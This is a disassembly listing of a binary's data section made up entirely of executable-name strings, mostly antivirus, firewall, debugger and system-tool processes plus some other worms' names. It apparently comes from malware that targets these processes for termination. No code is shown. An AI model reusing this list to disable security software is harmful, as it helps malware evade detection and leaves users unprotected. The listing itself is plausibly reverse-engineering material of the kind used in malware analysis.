aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .data:0042BC10�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .data:0042BC0C�o
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .data:0042BC08�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .data:0042BC04�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .data:0042BC00�o
align 4
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .data:0042BBFC�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .data:0042BBF8�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: .data:0042BBF4�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .data:0042BBF0�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .data:0042BBEC�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .data:0042BBE8�o
align 10h
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .data:0042BBE4�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .data:0042BBE0�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .data:0042BBDC�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .data:0042BBD8�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .data:0042BBD4�o
align 4
aSd_exe db 'SD.EXE',0 ; DATA XREF: .data:0042BBD0�o
align 10h
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .data:0042BBCC�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .data:0042BBC8�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .data:0042BBC4�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .data:0042BBC0�o
align 10h
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .data:0042BBBC�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .data:0042BBB8�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .data:0042BBB4�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: .data:0042BBB0�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .data:0042BBAC�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .data:0042BBA8�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .data:0042BBA4�o
align 10h
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .data:0042BBA0�o
align 10h
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .data:0042BB9C�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .data:0042BB98�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .data:0042BB94�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .data:0042BB90�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .data:0042BB8C�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .data:0042BB88�o
align 4
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .data:0042BB84�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .data:0042BB80�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .data:0042BB7C�o
align 10h
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .data:0042BB78�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .data:0042BB74�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .data:0042BB70�o
align 4
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .data:0042BB6C�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .data:0042BB68�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .data:0042BB64�o
align 10h
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .data:0042BB60�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .data:0042BB5C�o
align 4
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .data:0042BB58�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .data:0042BB54�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .data:0042BB50�o
align 10h
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .data:0042BB4C�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .data:0042BB48�o
align 4
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .data:0042BB44�o
align 4
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .data:0042BB40�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .data:0042BB3C�o
align 10h
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .data:0042BB38�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .data:0042BB34�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .data:0042BB30�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .data:0042BB2C�o
align 10h
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .data:0042BB28�o
align 10h
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .data:0042BB24�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .data:0042BB20�o
align 10h
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .data:0042BB1C�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .data:0042BB18�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .data:0042BB14�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .data:0042BB10�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .data:0042BB0C�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .data:0042BB08�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .data:0042BB04�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .data:0042BB00�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .data:0042BAFC�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .data:0042BAF8�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .data:0042BAF4�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .data:0042BAF0�o
align 10h
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .data:0042BAEC�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .data:0042BAE8�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .data:0042BAE4�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .data:0042BAE0�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .data:0042BADC�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .data:0042BAD8�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .data:0042BAD4�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .data:0042BAD0�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .data:0042BACC�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .data:0042BAC8�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .data:0042BAC4�o
align 4
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .data:0042BAC0�o
align 10h
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .data:0042BABC�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .data:0042BAB8�o
align 4
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .data:0042BAB4�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .data:0042BAB0�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .data:0042BAAC�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .data:0042BAA8�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .data:0042BAA4�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .data:0042BAA0�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .data:0042BA9C�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .data:0042BA98�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .data:0042BA94�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .data:0042BA90�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .data:0042BA8C�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .data:0042BA88�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .data:0042BA84�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .data:0042BA80�o
align 10h
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .data:0042BA7C�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .data:0042BA78�o
align 4
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .data:0042BA74�o
align 10h
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .data:0042BA70�o
align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .data:0042BA68�o
; .data:0042BA6C�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .data:0042BA64�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .data:0042BA60�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .data:0042BA5C�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .data:0042BA58�o
align 4
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .data:0042BA54�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .data:0042BA50�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .data:0042BA4C�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .data:0042BA48�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .data:0042BA44�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .data:0042BA40�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .data:0042BA3C�o
align 4
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .data:0042BA34�o
; .data:0042BA38�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .data:0042BA30�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .data:0042BA2C�o
align 10h
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .data:0042BA28�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .data:0042BA24�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .data:0042BA20�o
align 4
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .data:0042BA1C�o
align 4
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .data:0042BA18�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .data:0042BA14�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .data:0042BA10�o
align 10h
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .data:0042BA0C�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .data:0042BA08�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .data:0042BA04�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .data:0042BA00�o
align 10h
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .data:0042B9FC�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .data:0042B9F8�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .data:0042B9F4�o
align 10h
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .data:0042B9F0�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .data:0042B9EC�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .data:0042B9E8�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .data:0042B9E4�o
align 10h
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .data:0042B9E0�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .data:0042B9DC�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .data:0042B9D8�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .data:0042B9D4�o
align 10h
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .data:0042B9D0�o
align 10h
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .data:0042B9CC�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .data:0042B9C8�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .data:0042B9C4�o
align 4
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .data:0042B9C0�o
align 4
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .data:0042B9BC�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .data:0042B9B8�o
align 4
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .data:0042B9B4�o
align 10h
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .data:0042B9B0�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .data:0042B9AC�o
align 4
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .data:0042B9A8�o
align 4
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .data:0042B9A4�o
align 10h
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .data:0042B9A0�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .data:0042B99C�o
align 4
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .data:0042B998�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .data:0042B994�o
align 10h
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .data:0042B990�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .data:0042B98C�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .data:0042B988�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .data:0042B984�o
align 10h
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .data:0042B980�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .data:0042B97C�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .data:0042B978�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .data:0042B974�o
align 10h
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .data:0042B970�o
align 10h
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .data:0042B96C�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .data:0042B968�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .data:0042B964�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .data:0042B960�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .data:0042B95C�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .data:0042B958�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .data:0042B954�o
align 10h
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .data:0042B950�o
align 10h
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .data:0042B94C�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .data:0042B948�o
align 4
aMsconfig_exe_0 db 'MSCONFIG.EXE',0 ; DATA XREF: .data:0042B944�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .data:0042B940�o
align 4
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .data:0042B93C�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .data:0042B938�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .data:0042B934�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .data:0042B930�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .data:0042B92C�o
align 10h
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .data:0042B928�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .data:0042B924�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .data:0042B920�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .data:0042B91C�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .data:0042B918�o
align 4
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .data:0042B914�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .data:0042B910�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .data:0042B90C�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .data:0042B908�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .data:0042B904�o
align 10h
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .data:0042B900�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .data:0042B8FC�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .data:0042B8F8�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .data:0042B8F4�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .data:0042B8F0�o
align 4
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .data:0042B8EC�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: .data:0042B8E8�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .data:0042B8E4�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .data:0042B8E0�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .data:0042B8D8�o
; .data:0042B8DC�o
align 4
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .data:0042B8D4�o
align 4
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .data:0042B8D0�o
align 4
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .data:0042B8CC�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .data:0042B8C8�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .data:0042B8C4�o
align 10h
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .data:0042B8C0�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .data:0042B8BC�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .data:0042B8B8�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .data:0042B8B4�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .data:0042B8AC�o
; .data:0042B8B0�o
align 10h
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .data:0042B8A8�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .data:0042B8A4�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .data:0042B8A0�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .data:0042B89C�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .data:0042B898�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .data:0042B894�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .data:0042B890�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .data:0042B88C�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .data:0042B888�o
align 10h
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .data:0042B884�o
align 10h
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .data:0042B880�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .data:0042B87C�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .data:0042B878�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .data:0042B874�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .data:0042B870�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .data:0042B86C�o
align 10h
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .data:0042B868�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .data:0042B864�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .data:0042B860�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .data:0042B85C�o
align 10h
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .data:0042B858�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .data:0042B854�o
align 10h
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .data:0042B850�o
align 4
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .data:0042B84C�o
align 10h
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .data:0042B848�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .data:0042B844�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .data:0042B840�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .data:0042B83C�o
align 10h
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .data:0042B838�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .data:0042B834�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .data:0042B830�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .data:0042B82C�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .data:0042B828�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .data:0042B824�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .data:0042B820�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .data:0042B81C�o
align 10h
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .data:0042B818�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .data:0042B814�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .data:0042B810�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .data:0042B80C�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .data:0042B808�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .data:0042B804�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .data:0042B800�o
align 10h
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .data:0042B7FC�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .data:0042B7F8�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .data:0042B7F0�o
; .data:0042B7F4�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .data:0042B7EC�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .data:0042B7E8�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .data:0042B7E4�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .data:0042B7E0�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .data:0042B7DC�o
align 10h
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .data:0042B7D8�o
align 10h
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .data:0042B7D4�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .data:0042B7D0�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .data:0042B7CC�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .data:0042B7C8�o
align 10h
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .data:0042B7C4�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .data:0042B7C0�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .data:0042B7BC�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .data:0042B7B8�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .data:0042B7B4�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .data:0042B7B0�o
align 10h
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .data:0042B7AC�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .data:0042B7A8�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .data:0042B7A4�o
align 10h
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .data:0042B7A0�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .data:0042B79C�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .data:0042B798�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .data:0042B794�o
align 10h
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .data:0042B790�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .data:0042B78C�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .data:0042B788�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .data:0042B784�o
align 10h
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .data:0042B780�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .data:0042B77C�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .data:0042B778�o
align 4
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .data:0042B774�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .data:0042B770�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .data:0042B76C�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .data:0042B768�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .data:0042B764�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .data:0042B760�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .data:0042B75C�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .data:0042B758�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .data:0042B754�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .data:0042B750�o
align 10h
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .data:0042B74C�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .data:0042B748�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .data:0042B744�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .data:0042B740�o
align 10h
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .data:0042B73C�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .data:0042B738�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .data:0042B734�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .data:0042B730�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .data:0042B72C�o
align 10h
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .data:0042B728�o
align 4
